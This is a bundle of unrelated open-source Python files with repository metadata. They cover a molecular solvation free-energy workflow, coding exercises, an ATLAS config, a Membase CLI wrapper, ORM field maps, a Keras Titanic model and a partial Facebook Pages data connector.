8c4ef53ec6c7df2eeeb633a53d1d931558596366
/propertyestimator/properties/solvation.py
846f77dd90fa87534dec104a50d994e4dbc33f4f
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
MSchauperl/propertyestimator
ff7bf2d3b6bc441141258483ec991f8806b09469
9a67cb61498024c511f9bbe55536ac8e1a3c93be
refs/heads/master
2020-09-08T07:04:39.660322
2019-11-08T21:15:23
2019-11-08T21:15:23
221,055,340
0
0
NOASSERTION
2019-11-14T21:47:11
2019-11-11T19:34:28
null
UTF-8
Python
false
false
8,120
py
""" A collection of physical property definitions relating to solvation free energies. """ from propertyestimator import unit from propertyestimator.properties import PhysicalProperty from propertyestimator.properties.plugins import register_estimable_property from propertyestimator.protocols import coordinates, forcefield, miscellaneous, yank, simulation, groups from propertyestimator.substances import Substance from propertyestimator.thermodynamics import Ensemble from propertyestimator.workflow import WorkflowOptions from propertyestimator.workflow.schemas import WorkflowSchema from propertyestimator.workflow.utils import ProtocolPath @register_estimable_property() class SolvationFreeEnergy(PhysicalProperty): """A class representation of a solvation free energy property.""" @staticmethod def get_default_workflow_schema(calculation_layer, options=None): if calculation_layer == 'SimulationLayer': # Currently reweighting is not supported. return SolvationFreeEnergy.get_default_simulation_workflow_schema(options) return None @staticmethod def get_default_simulation_workflow_schema(options=None): """Returns the default workflow to use when estimating this property from direct simulations. Parameters ---------- options: WorkflowOptions The default options to use when setting up the estimation workflow. Returns ------- WorkflowSchema The schema to follow when estimating this property. """ # Setup the fully solvated systems. build_full_coordinates = coordinates.BuildCoordinatesPackmol('build_solvated_coordinates') build_full_coordinates.substance = ProtocolPath('substance', 'global') build_full_coordinates.max_molecules = 2000 assign_full_parameters = forcefield.BuildSmirnoffSystem(f'assign_solvated_parameters') assign_full_parameters.force_field_path = ProtocolPath('force_field_path', 'global') assign_full_parameters.substance = ProtocolPath('substance', 'global') assign_full_parameters.coordinate_file_path = ProtocolPath('coordinate_file_path', build_full_coordinates.id) # Perform a quick minimisation of the full system to give # YANK a better starting point for its minimisation. energy_minimisation = simulation.RunEnergyMinimisation('energy_minimisation') energy_minimisation.system_path = ProtocolPath('system_path', assign_full_parameters.id) energy_minimisation.input_coordinate_file = ProtocolPath('coordinate_file_path', build_full_coordinates.id) equilibration_simulation = simulation.RunOpenMMSimulation('equilibration_simulation') equilibration_simulation.ensemble = Ensemble.NPT equilibration_simulation.steps_per_iteration = 100000 equilibration_simulation.output_frequency = 10000 equilibration_simulation.timestep = 2.0 * unit.femtosecond equilibration_simulation.thermodynamic_state = ProtocolPath('thermodynamic_state', 'global') equilibration_simulation.system_path = ProtocolPath('system_path', assign_full_parameters.id) equilibration_simulation.input_coordinate_file = ProtocolPath('output_coordinate_file', energy_minimisation.id) # Create a substance which only contains the solute (e.g. for the # vacuum phase simulations). filter_solvent = miscellaneous.FilterSubstanceByRole('filter_solvent') filter_solvent.input_substance = ProtocolPath('substance', 'global') filter_solvent.component_role = Substance.ComponentRole.Solvent filter_solute = miscellaneous.FilterSubstanceByRole('filter_solute') filter_solute.input_substance = ProtocolPath('substance', 'global') filter_solute.component_role = Substance.ComponentRole.Solute # Setup the solute in vacuum system. build_vacuum_coordinates = coordinates.BuildCoordinatesPackmol('build_vacuum_coordinates') build_vacuum_coordinates.substance = ProtocolPath('filtered_substance', filter_solute.id) build_vacuum_coordinates.max_molecules = 1 assign_vacuum_parameters = forcefield.BuildSmirnoffSystem(f'assign_parameters') assign_vacuum_parameters.force_field_path = ProtocolPath('force_field_path', 'global') assign_vacuum_parameters.substance = ProtocolPath('filtered_substance', filter_solute.id) assign_vacuum_parameters.coordinate_file_path = ProtocolPath('coordinate_file_path', build_vacuum_coordinates.id) # Set up the protocol to run yank. run_yank = yank.SolvationYankProtocol('run_solvation_yank') run_yank.solute = ProtocolPath('filtered_substance', filter_solute.id) run_yank.solvent_1 = ProtocolPath('filtered_substance', filter_solvent.id) run_yank.solvent_2 = Substance() run_yank.thermodynamic_state = ProtocolPath('thermodynamic_state', 'global') run_yank.steps_per_iteration = 500 run_yank.checkpoint_interval = 50 run_yank.solvent_1_coordinates = ProtocolPath('output_coordinate_file', equilibration_simulation.id) run_yank.solvent_1_system = ProtocolPath('system_path', assign_full_parameters.id) run_yank.solvent_2_coordinates = ProtocolPath('coordinate_file_path', build_vacuum_coordinates.id) run_yank.solvent_2_system = ProtocolPath('system_path', assign_vacuum_parameters.id) # Set up the group which will run yank until the free energy has been determined to within # a given uncertainty conditional_group = groups.ConditionalGroup(f'conditional_group') conditional_group.max_iterations = 20 if options.convergence_mode != WorkflowOptions.ConvergenceMode.NoChecks: condition = groups.ConditionalGroup.Condition() condition.condition_type = groups.ConditionalGroup.ConditionType.LessThan condition.right_hand_value = ProtocolPath('target_uncertainty', 'global') condition.left_hand_value = ProtocolPath('estimated_free_energy.uncertainty', conditional_group.id, run_yank.id) conditional_group.add_condition(condition) # Define the total number of iterations that yank should run for. total_iterations = miscellaneous.MultiplyValue('total_iterations') total_iterations.value = 2000 total_iterations.multiplier = ProtocolPath('current_iteration', conditional_group.id) # Make sure the simulations gets extended after each iteration. run_yank.number_of_iterations = ProtocolPath('result', total_iterations.id) conditional_group.add_protocols(total_iterations, run_yank) # Define the full workflow schema. schema = WorkflowSchema(property_type=SolvationFreeEnergy.__name__) schema.id = '{}{}'.format(SolvationFreeEnergy.__name__, 'Schema') schema.protocols = { build_full_coordinates.id: build_full_coordinates.schema, assign_full_parameters.id: assign_full_parameters.schema, energy_minimisation.id: energy_minimisation.schema, equilibration_simulation.id: equilibration_simulation.schema, filter_solvent.id: filter_solvent.schema, filter_solute.id: filter_solute.schema, build_vacuum_coordinates.id: build_vacuum_coordinates.schema, assign_vacuum_parameters.id: assign_vacuum_parameters.schema, conditional_group.id: conditional_group.schema } schema.final_value_source = ProtocolPath('estimated_free_energy', conditional_group.id, run_yank.id) return schema
b10bd3e6fce28ba55ca234a9dcb7dd608cd4763a
0de115b69243361e7926d0a5400c1fb475a642f5
/4.5.4 CodingExercise2.py
7769a572921fc132cf0a40d0db1879e526643fc9
[]
no_license
Bill-Fujimoto/Intro-to-Python-Course
f475f1c578e33ac37a796038fdaa6ad247876c55
afe365b0233c4fadb78b2818164ab5726ecd92bb
refs/heads/master
2020-04-12T21:19:08.688112
2018-12-21T21:50:09
2018-12-21T21:50:09
162,759,968
0
0
null
null
null
null
UTF-8
Python
false
false
1,977
py
#Recall last exercise that you wrote a function, word_lengths, #which took in a string and returned a dictionary where each #word of the string was mapped to an integer value of how #long it was. # #This time, write a new function called length_words so that #the returned dictionary maps an integer, the length of a #word, to a list of words from the sentence with that length. #If a word occurs more than once, add it more than once. The #words in the list should appear in the same order in which #they appeared in the sentence. # #For example: # # length_words("I ate a bowl of cereal out of a dog bowl today.") # -> {3: ['ate', 'dog', 'out'], 1: ['a', 'a', 'i'], # 5: ['today'], 2: ['of', 'of'], 4: ['bowl'], 6: ['cereal']} # #As before, you should remove any punctuation and make the #string lowercase. # #Hint: To create a new list as the value for a dictionary key, #use empty brackets: lengths[wordLength] = []. Then, you would #be able to call lengths[wordLength].append(word). Note that #if you try to append to the list before creating it for that #key, you'll receive a KeyError. #Write your function here! def length_words(string): to_replace = ".,'!?" for mark in to_replace: string = string.replace(mark, "") string=string.lower() word_list=string.split() len_words={} for word in word_list: if not len(word)in len_words: len_words[len(word)] = [] len_words[len(word)].append(word) return len_words #Below are some lines of code that will test your function. #You can change the value of the variable(s) to test your #function with different inputs. # #If your function works correctly, this will originally #print: #{1: ['i', 'a', 'a'], 2: ['of', 'of'], 3: ['ate', 'out', 'dog'], 4: ['bowl', 'bowl'], 5: ['today'], 6: ['cereal']} # #The keys may appear in a different order, but within each #list the words should appear in the order shown above. print(length_words("I ate a bowl of cereal out of a dog bowl today."))
[ "@vfr1200f1#" ]
@vfr1200f1#
3b91d9f42ee1ecda8632567b35ac5caa51d497c7
35053a371d85c2d45a4f52239d8a70b38194ef48
/Count of Matches in Tournament.py
96c8b115113e1096f964d3dcc4f40e3f4b7f16a1
[]
no_license
Kuehar/LeetCode
51d169c81a2e572ea854399fc78e1130220388f9
4555c20455f181f9dd7b3aba2a8779dea795edfb
refs/heads/master
2023-04-16T10:13:03.584541
2023-04-06T11:47:21
2023-04-06T11:47:21
243,361,421
4
0
null
null
null
null
UTF-8
Python
false
false
388
py
class Solution: def numberOfMatches(self, n: int) -> int: return n-1 # O(1) Solution. # Always this answer is n-1. Sum of matches are always equals to sum of loser. # Runtime: 28 ms, faster than 82.44% of Python3 online submissions for Count of Matches in Tournament. # Memory Usage: 14.3 MB, less than 40.04% of Python3 online submissions for Count of Matches in Tournament.
c7a6bbfb9e4f4606a0720e7f9c0efa56e7d90f30
b22588340d7925b614a735bbbde1b351ad657ffc
/athena/DataQuality/DataQualityConfigurations/python/TCTDisplay.py
6fa11e45427f043ea1f2b19da409200372d1fc14
[]
no_license
rushioda/PIXELVALID_athena
90befe12042c1249cbb3655dde1428bb9b9a42ce
22df23187ef85e9c3120122c8375ea0e7d8ea440
refs/heads/master
2020-12-14T22:01:15.365949
2020-01-19T03:59:35
2020-01-19T03:59:35
234,836,993
1
0
null
null
null
null
UTF-8
Python
false
false
1,330
py
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration from DataQualityUtils.DQWebDisplayConfig import DQWebDisplayConfig dqconfig = DQWebDisplayConfig() dqconfig.config = "TCT" dqconfig.hcfg = "/afs/cern.ch/user/a/atlasdqm/dqmdisk/tier0/han_config/Collisions/collisions_run.1.41.hcfg" dqconfig.hcfg_min10 = "/afs/cern.ch/user/a/atlasdqm/dqmdisk/tier0/han_config/Collisions/collisions_minutes10.1.9.hcfg" dqconfig.hcfg_min30 = "/afs/cern.ch/user/a/atlasdqm/dqmdisk/tier0/han_config/Collisions/collisions_minutes30.1.5.hcfg" dqconfig.hanResultsDir = "/afs/cern.ch/atlas/offline/external/FullChainTest/tier0/dqm/han_results" dqconfig.htmlDir = "/afs/cern.ch/atlas/offline/external/FullChainTest/tier0/dqm/www" dqconfig.htmlWeb = "http://atlas-project-fullchaintest.web.cern.ch/atlas-project-FullChainTest/tier0/dqm/www" dqconfig.runlist = "runlist_TCT.xml" dqconfig.indexFile = "results_TCT.html" dqconfig.lockFile = "DQWebDisplay_TCT.lock" dqconfig.dbConnection = "sqlite://;schema=MyCOOL_histo.db;dbname=OFLP200" dqconfig.dqmfOfl = "/GLOBAL/DETSTATUS/DQMFOFL" dqconfig.dbConnectionHisto = "sqlite://;schema=MyCOOL_histo.db;dbname=OFLP200" dqconfig.dqmfOflHisto = "/GLOBAL/DETSTATUS/DQMFOFLH" dqconfig.dbTagName = "DetStatusDQMFOFL-TCT"
c20a34f0a583217bc2954583f5023db885908a21
6dd08ec6b4f6351de8450a3d7e592fd6b4994119
/cbase/server/cbase-1.8.1/testrunner/lib/cli_interface.py
e6a6f9806a3859205b951f3f754ca879f82d6278
[ "Apache-2.0" ]
permissive
zhgwenming/appstack
d015e96b911fe318f9fba1bdeeea9d888d57dfba
8fe6c1dfc2f5ed4a36c335e86ae28c17b3769276
refs/heads/master
2021-01-23T13:30:19.507537
2015-11-09T06:48:35
2015-11-09T06:48:35
7,576,644
1
2
null
2016-01-05T09:16:22
2013-01-12T15:13:21
C
UTF-8
Python
false
false
6,194
py
#!/usr/bin/env python # # Copyright 2010 Membase, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # PYTHONPATH needs to be set up to point to mc_bin_client import os import subprocess DEF_USERNAME = "Administrator" DEF_PASSWORD = "password" DEF_KIND = "json" DEF_MOXI_PORT = 11211 DEF_HTTP_PORT = 8091 DEF_RAMSIZE = 256 DEF_REPLICA = 1 CLI_EXE_LOC = "../membase-cli/membase" SSH_EXE_LOC = "/opt/membase/bin/cli/membase" class CLIInterface(object): def __init__(self, server, http_port=DEF_HTTP_PORT, username=DEF_USERNAME, password=DEF_PASSWORD, kind=DEF_KIND, debug=False, ssh=False, sshkey=None): self.server = server self.http_port = http_port self.username = username self.password = password self.kind = kind self.debug = debug self.ssh = ssh self.sshkey = sshkey if (debug): self.acting_server_args = "-c %s:%d -u %s -p %s -o %s -d" % (self.server, self.http_port, self.username, self.password, self.kind) else: self.acting_server_args = "-c %s:%d -u %s -p %s -o %s" % (self.server, self.http_port, self.username, self.password, self.kind) def server_list(self): cmd = " server-list " + self.acting_server_args return self.execute_command(cmd) def server_info(self): cmd = " server-info " + self.acting_server_args return self.execute_command(cmd) def server_add(self, server_to_add, rebalance=False): if (rebalance): cmd = " rebalance " + self.acting_server_args + " --server-add=%s:%d --server-add-username=%s --server-add-password=%s"\ % (server_to_add, self.http_port, self.username, self.password) else: cmd = " server-add " + self.acting_server_args + " --server-add=%s:%d --server-add-username=%s --server-add-password=%s"\ % (server_to_add, self.http_port, self.username, self.password) return self.execute_command(cmd) def server_readd(self, server_to_readd): cmd = " server-readd " + self.acting_server_args + " --server-add=%s:%d --server-add-username=%s --server-add-password=%s"\ % (server_to_readd, self.http_port, self.username, self.password) return self.execute_command(cmd) def rebalance(self): cmd = " rebalance " + self.acting_server_args return self.execute_command(cmd) def rebalance_stop(self): cmd = " reblance-stop " + self.acting_server_args return self.execute_command(cmd) def rebalance_status(self): cmd = " rebalance-status " + self.acting_server_args return self.execute_command(cmd) def failover(self, server_to_failover): cmd = " failover " + self.acting_server_args + " --server-failover %s" % (server_to_failover) return self.execute_command(cmd) def cluster_init(self, c_username=DEF_USERNAME, c_password=DEF_PASSWORD, c_port=DEF_HTTP_PORT, c_ramsize=DEF_RAMSIZE): cmd = " cluster-init " + self.acting_server_args\ + " --cluster-init-username=%s --cluster-init-password=%s --cluster-init-port=%d --cluster-init-ramsize=%d"\ % (c_username, c_password, c_port, c_ramsize) return self.execute_command(cmd) def node_init(self, path): cmd = " node-init " + self.acting_server_args + " --node-init-data-path=%s" % (path) return self.execute_command(cmd) def bucket_list(self): cmd = " bucket-list " + self.acting_server_args return self.execute_command(cmd) def bucket_create(self, bucket_name, bucket_type, bucket_port, bucket_password="", bucket_ramsize=DEF_RAMSIZE, replica_count=DEF_REPLICA): cmd = " bucket-create " + self.acting_server_args\ + " --bucket=%s --bucket-type=%s --bucket-port=%d --bucket-password=%s --bucket-ramsize=%d --bucket-replica=%d"\ % (bucket_name, bucket_type, bucket_port, bucket_password, bucket_ramsize, replica_count) return self.execute_command(cmd) def bucket_edit(self, bucket_name, bucket_type, bucket_port, bucket_password, bucket_ramsize, replica_count): cmd = " bucket-edit " + self.acting_server_args\ + " --bucket=%s --bucket-type=%s --bucket-port=%d --bucket-password=%s --bucket-ramsize=%d --bucket-replica=%d"\ % (bucket_name, bucket_type, bucket_port, bucket_password, bucket_ramsize, replica_count) return self.execute_command(cmd) def bucket_delete(self, bucket_name): cmd = " bucket-delete " + self.acting_server_args + " --bucket=%s" % (bucket_name) return self.execute_command(cmd) def bucket_flush(self): return "I don't work yet :-(" def execute_command(self, cmd): if (self.ssh): return self.execute_ssh(SSH_EXE_LOC + cmd) else: return self.execute_local(CLI_EXE_LOC + cmd) def execute_local(self, cmd): rtn = "" process = subprocess.Popen(cmd ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) stdoutdata,stderrdata=process.communicate() rtn += stdoutdata return rtn def execute_ssh(self, cmd): rtn="" if (self.sshkey == None): process = subprocess.Popen("ssh root@%s \"%s\"" % (self.server,cmd),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) else: process = subprocess.Popen("ssh -i %s root@%s \"%s\"" % (self.sshkey, self.server, cmd),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) stdoutdata,stderrdata=process.communicate() rtn += stdoutdata return rtn
875a564377d75822b6c87a33792ad8d32b40b7b6
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
/sdk/python/pulumi_azure_native/datacatalog/outputs.py
26d9e4bddb4ce2d56c83f67f19a73cd325ca56ef
[ "BSD-3-Clause", "Apache-2.0" ]
permissive
MisinformedDNA/pulumi-azure-native
9cbd75306e9c8f92abc25be3f73c113cb93865e9
de974fd984f7e98649951dbe80b4fc0603d03356
refs/heads/master
2023-03-24T22:02:03.842935
2021-03-08T21:16:19
2021-03-08T21:16:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,362
py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from .. import _utilities, _tables from ._enums import * __all__ = [ 'PrincipalsResponse', ] @pulumi.output_type class PrincipalsResponse(dict): """ User principals. """ def __init__(__self__, *, object_id: Optional[str] = None, upn: Optional[str] = None): """ User principals. :param str object_id: Object Id for the user :param str upn: UPN of the user. """ if object_id is not None: pulumi.set(__self__, "object_id", object_id) if upn is not None: pulumi.set(__self__, "upn", upn) @property @pulumi.getter(name="objectId") def object_id(self) -> Optional[str]: """ Object Id for the user """ return pulumi.get(self, "object_id") @property @pulumi.getter def upn(self) -> Optional[str]: """ UPN of the user. """ return pulumi.get(self, "upn") def _translate_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
494c1e3a8da4af904b0d96a5540e85b475400cc2
0e4860fecfdd34a3255003cc8c8df086c14083dd
/python/practise/带你学Django资料及源码/课堂与博客代码/peace_blog/blog/admin.py
9c1fb6228842fe4ec5d8931dc4a0aad2aa044aa9
[]
no_license
anzhihe/learning
503ab9a58f280227011da5eaa4b14b46c678e6f3
66f7f801e1395207778484e1543ea26309d4b354
refs/heads/master
2023-08-08T11:42:11.983677
2023-07-29T09:19:47
2023-07-29T09:19:47
188,768,643
1,443
617
null
2023-08-24T02:10:34
2019-05-27T04:04:10
Python
UTF-8
Python
false
false
289
py
from django.contrib import admin from .models import * # Register your models here. admin.site.register(Banner) admin.site.register(Category) admin.site.register(Tag) admin.site.register(Article) admin.site.register(FriendLink) admin.site.register(Comment) admin.site.register(BlogUser)
b3b23e56815e22c59025e95c60b6cbda2ae81e07
9fbe90eab4cb25022e7c93776da3a5733656a09a
/examples/chat/status.py
9f517a087999e1a586d64cffee8075515a5e83ea
[ "MIT" ]
permissive
Nathanator/networkzero
453e218d6e0b8080158cb968f4acc5e0cb0fb65c
e6bf437f424660c32cf1ef81f83d9eee925f44e7
refs/heads/master
2021-01-15T13:14:53.101742
2016-04-07T20:32:28
2016-04-07T20:32:28
55,724,894
0
0
null
2016-04-07T20:12:18
2016-04-07T20:12:17
null
UTF-8
Python
false
false
467
py
import networkzero as nw0 updates = nw0.discover("chat-updates") while True: action, message = nw0.wait_for_notification(updates) print(action, message) if action == "JOIN": print("%s has joined" % message) elif action == "LEAVE": print("%s has left" % message) elif action == "SPEAK": [person, words] = message print("%s says: %s" % (person, words)) else: print("!! Unexpected message: %s" % message)
cb2811ebb7323dde07db3204b7cbb018b4aa24df
b5aef1178c9153ca0c4dd9823e5fa2a2bc64649f
/sqlalchemy_to_ormar/maps.py
1a9e860b78fc123c5831dcea9f9bd6c03d9d63d5
[ "MIT" ]
permissive
collerek/sqlalchemy-to-ormar
970a56c69ff03b7e32b11e4b1ebcb00c3b8d903c
07c1595297221b31db86b3d34b3aad54fa3967da
refs/heads/main
2023-04-23T10:41:04.426391
2021-05-16T14:10:38
2021-05-16T14:10:38
355,256,537
10
1
null
null
null
null
UTF-8
Python
false
false
1,602
py
from typing import Dict, Set, Type import ormar from ormar import Model FIELD_MAP = { "integer": ormar.Integer, "tinyint": ormar.Integer, "smallint": ormar.Integer, "bigint": ormar.Integer, "small_integer": ormar.Integer, "big_integer": ormar.BigInteger, "string": ormar.String, "char": ormar.String, "varchar": ormar.String, "text": ormar.Text, "mediumtext": ormar.Text, "longtext": ormar.Text, "float": ormar.Float, "decimal": ormar.Decimal, "date": ormar.Date, "datetime": ormar.DateTime, "timestamp": ormar.DateTime, "time": ormar.Time, "boolean": ormar.Boolean, "bit": ormar.Boolean, } TYPE_SPECIFIC_PARAMETERS: Dict[str, Dict] = { "string": {"max_length": {"key": "length", "default": 255}}, "varchar": {"max_length": {"key": "length", "default": 255}}, "char": {"max_length": {"key": "length", "default": 255}}, "decimal": { "max_digits": {"key": "precision", "default": 18}, "decimal_places": {"key": "scale", "default": 6}, }, } COMMON_PARAMETERS: Dict[str, Dict] = dict( name={"key": "name", "default": None}, primary_key={"key": "primary_key", "default": False}, autoincrement={"key": "autoincrement", "default": False}, index={"key": "index", "default": False}, unique={"key": "unique", "default": False}, nullable={"key": "nullable", "default": None}, default={"key": "default", "default": None}, server_default={"key": "server_default", "default": None}, ) PARSED_MODELS: Dict[Type, Type[Model]] = dict() CURRENTLY_PROCESSED: Set = set()
435f09a949e10d5926b47462513ec6a935159a57
ba4f68fb01aa32970dadea67cc8d039b4c0f6d9e
/python/facebook_abcs/graphs/bfs_short_reach.py
d7e090dc241a595327009effbf8e195b8a27e16d
[]
no_license
campbellmarianna/Code-Challenges
12a7808563e36b1a2964f10ae64618c0be41b6c0
12e21c51665d81cf1ea94c2005f4f9d3584b66ec
refs/heads/master
2021-08-03T23:23:58.297437
2020-05-15T07:13:46
2020-05-15T07:13:46
168,234,828
0
0
null
null
null
null
UTF-8
Python
false
false
3,585
py
''' Prompt: Consider an undirected graph where each edge is the same weight. Each of the nodes is labeled consecutively. You will be given a number of queries. For each query, you will be given a list of edges describing an undirected graph. After you create a representation of the graph, you must determine and report the shortest distance to each of the other nodes from a given starting position using the breadth-first search algorithm (BFS). Distances are to be reported in node number order, ascending. If a node is unreachable, print for that node. Each of the edges weighs 6 units of distance. For example, given a graph with nodes and edges, , a visual representation is: image The start node for the example is node . Outputs are calculated for distances to nodes through : . Each edge is units, and the unreachable node has the required return distance of . Function Description Complete the bfs function in the editor below. It must return an array of integers representing distances from the start node to each other node in node ascending order. If a node is unreachable, its distance is . bfs has the following parameter(s): n: the integer number of nodes m: the integer number of edges edges: a 2D array of start and end nodes for edges s: the node to start traversals from Input Format The first line contains an integer , the number of queries. Each of the following sets of lines has the following format: The first line contains two space-separated integers and , the number of nodes and edges in the graph. Each line of the subsequent lines contains two space-separated integers, and , describing an edge connecting node to node . The last line contains a single integer, , denoting the index of the starting node. Constraints Output Format For each of the queries, print a single line of space-separated integers denoting the shortest distances to each of the other nodes from starting position . These distances should be listed sequentially by node number (i.e., ), but should not include node . If some node is unreachable from , print as the distance to that node. Sample Input 2 # the number of queries 4 2 # n: number of nodes m: number of edges in the graph 1 2 # u and v: describing an edge connecting node u to node v 1 3 1 3 1 2 3 2 # s: denoting the index of the starting node. Sample Output 6 6 -1 -1 6 ''' # Very helpful Bread First Search is looping through a sorted array and adding to a queue # https: // www.youtube.com/watch?v = -uR7BSfNJko # Getting user input Iteration #1 # N = int(input()) # print(N) # for _ in range(N): # parts = input().strip().split(' ') # print(parts) for line in fileinput.input(): parts = line.strip().split(' ') print(parts) # Along with Breadth First Search Algorithm by lorisrossi https://www.hackerrank.com/challenges/bfsshortreach/forum def bfs(n, m, edges, s): from collections import deque # Build graph graph = {} for num in range(1, n+1): graph[num] = set() for l, r in edges: graph[l].add(r) graph[r].add(l) reached = {} # Explore graph once frontier = deque([(s, 0)]) seen = {s} while frontier: curr_node, curr_cost = frontier.popleft() for nbour in graph[curr_node]: if nbour not in seen: seen.add(nbour) reached[nbour] = curr_cost+6 frontier.append((nbour, curr_cost+6)) result = [] for node in range(1, n+1): if s != node: result.append(reached.get(node, -1)) return result
fa97ee9fd2838b1142288a25b7c3b07d01df9382
80f622252281e6288d24b101dda0d4ee3634faed
/Titanic/model/model.py
92f1eea0ae9e1af59615e0f34f8ec795553013ab
[]
no_license
jalondono/HandsOn-MachineLearning
c7cd7ce967180b84dffc2953d9ad5894c2bfc46e
eb3a3f2d6e490a827aa8b50cfb6e606cb3e85c5d
refs/heads/master
2023-01-03T01:10:32.836434
2020-10-29T15:47:27
2020-10-29T15:47:27
300,308,942
1
0
null
null
null
null
UTF-8
Python
false
false
4,158
py
import pandas as pd import numpy as np import tensorflow.keras as K import mlflow.tensorflow import sys import logging import zipfile # mlflow server --backend-store-uri mlruns/ --default-artifact-root mlruns/ --host 0.0.0.0 --port 5000 def getting_data(zipfolder, filename, cols): """ Get the data from a zip file :param path: direction to zip file :return: train dataset """ with zipfile.ZipFile(zipfolder, 'r') as zip_ref: zip_ref.extractall() data = pd.read_csv(filename, usecols=cols) print('data set shape: ', data.shape, '\n') print(data.head()) return data def process_args(argv): """ convert the data arguments into the needed format :param argv: Parameters :return: converted parameters """ data_path = sys.argv[1] if len(sys.argv) > 1 else '../data' debug = sys.argv[2].lower() if len(sys.argv) > 1 else 'false' model_type = sys.argv[3] if len(sys.argv) > 1 else [256, 128] model_type = model_type[1:-1].split(',') splited_network = [int(x) for x in model_type] alpha = float(sys.argv[4]) if len(sys.argv) > 1 else 0.5 l1_ratio = float(sys.argv[5]) if len(sys.argv) > 2 else 0 return data_path, debug, splited_network, alpha, l1_ratio def create_model(network): model = K.models.Sequential() model.add(K.layers.Dense(units=256, input_dim=6, kernel_initializer='ones', kernel_regularizer=K.regularizers.l1(l1_ratio), )) for units in network[1:]: model.add(K.layers.Dense(units=units, kernel_initializer='ones', kernel_regularizer=K.regularizers.l1(l1_ratio), )) model.add(K.layers.Dense(units=1, activation='sigmoid')) opt = K.optimizers.Adam(learning_rate=alpha) model.compile(optimizer=opt, loss='binary_crossentropy', metrics=['accuracy'], ) print(model.summary()) return model def train_model(model, X_train, Y_train, batch_size=128, epoch=80, val_split=0.1): """ Perform the training of the model :param model: model previously compiled :return: history """ history = model.fit(x=X_train, y=Y_train, batch_size=128, epochs=80, validation_split=0.1) return history if __name__ == '__main__': logging.basicConfig(level=logging.WARN) logger = logging.getLogger(__name__) # mlflow mlflow.tensorflow.autolog() # Utils cols from data train_cols = ['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare'] test_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare'] X_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare'] Y_cols = ['Survived'] # Get value arguments data_path, debug, network, alpha, l1_ratio = process_args(sys.argv) # train Data filename = 'train.csv' data = getting_data(data_path, filename, train_cols) data['Sex_b'] = pd.factorize(data.Sex)[0] data = data.drop(['Sex'], axis=1) data = data.rename(columns={"Sex_b": "Sex"}) # testing data filename = 'test.csv' test = getting_data(data_path, filename, test_cols) test['Sex_b'] = pd.factorize(test.Sex)[0] test = test.drop(['Sex'], axis=1) test = test.rename(columns={"Sex_b": "Sex"}) # filling train na values with mean column_means = data.mean() data = data.fillna(column_means) # filling test na values with mean column_means = test.mean() test = test.fillna(column_means) input_data = np.array(data[X_cols]) label_date = np.array(data[Y_cols]) test_input_data = np.array(test[X_cols]) X_train = input_data Y_train = label_date # definition of the model model = create_model(network) # training model history = train_model(model, X_train, Y_train) # predicting score = model.predict(test_input_data, batch_size=32, verbose=1) print("Test score:", score[0]) print("Test accuracy:", score[1])
08a65bb7db851c3827f50ea795ce9e58ad45c818
7eebbfaee45fdc57c4fc6ba32c87c35be1e62b14
/airbyte-integrations/connectors/source-facebook-pages/source_facebook_pages/streams.py
717fb1c76800fc295cff19b40b475069c0e2914a
[ "MIT", "Elastic-2.0" ]
permissive
Velocity-Engineering/airbyte
b6e1fcead5b9fd7c74d50b9f27118654604dc8e0
802a8184cdd11c1eb905a54ed07c8732b0c0b807
refs/heads/master
2023-07-31T15:16:27.644737
2021-09-28T08:43:51
2021-09-28T08:43:51
370,730,633
0
1
MIT
2021-06-08T05:58:44
2021-05-25T14:55:43
Java
UTF-8
Python
false
false
4,651
py
# # Copyright (c) 2021 Airbyte, Inc., all rights reserved. # from abc import ABC from typing import Any, Iterable, Mapping, MutableMapping, Optional import requests from airbyte_cdk.sources.streams.http import HttpStream from source_facebook_pages.metrics import PAGE_FIELDS, PAGE_METRICS, POST_FIELDS, POST_METRICS class FacebookPagesStream(HttpStream, ABC): url_base = "https://graph.facebook.com/v11.0/" primary_key = "id" data_field = "data" def __init__( self, access_token: str = None, page_id: str = None, **kwargs, ): super().__init__(**kwargs) self._access_token = access_token self._page_id = page_id @property def path_param(self): return self.name[:-1] def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: data = response.json() if not data.get("data") or not data.get("paging"): return {} return { "limit": 100, "after": data.get("paging", {}).get("cursors", {}).get("after"), } def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None, ) -> MutableMapping[str, Any]: next_page_token = next_page_token or {} params = {"access_token": self._access_token, **next_page_token} return params def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]: if not self.data_field: yield response.json() records = response.json().get(self.data_field, []) for record in records: yield record class Page(FacebookPagesStream): """ API docs: https://developers.facebook.com/docs/graph-api/reference/page/, """ data_field = "" def path(self, **kwargs) -> str: return self._page_id def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: return None def request_params(self, **kwargs) -> MutableMapping[str, Any]: params = super().request_params(**kwargs) # we have to define which fields will return from Facebook API # because FB API doesn't provide opportunity to get fields dynamically without delays # so in PAGE_FIELDS we define fields that user can get from API params["fields"] = PAGE_FIELDS return params class Post(FacebookPagesStream): """ https://developers.facebook.com/docs/graph-api/reference/v11.0/page/feed, """ def path(self, **kwargs) -> str: return f"{self._page_id}/posts" def request_params(self, **kwargs) 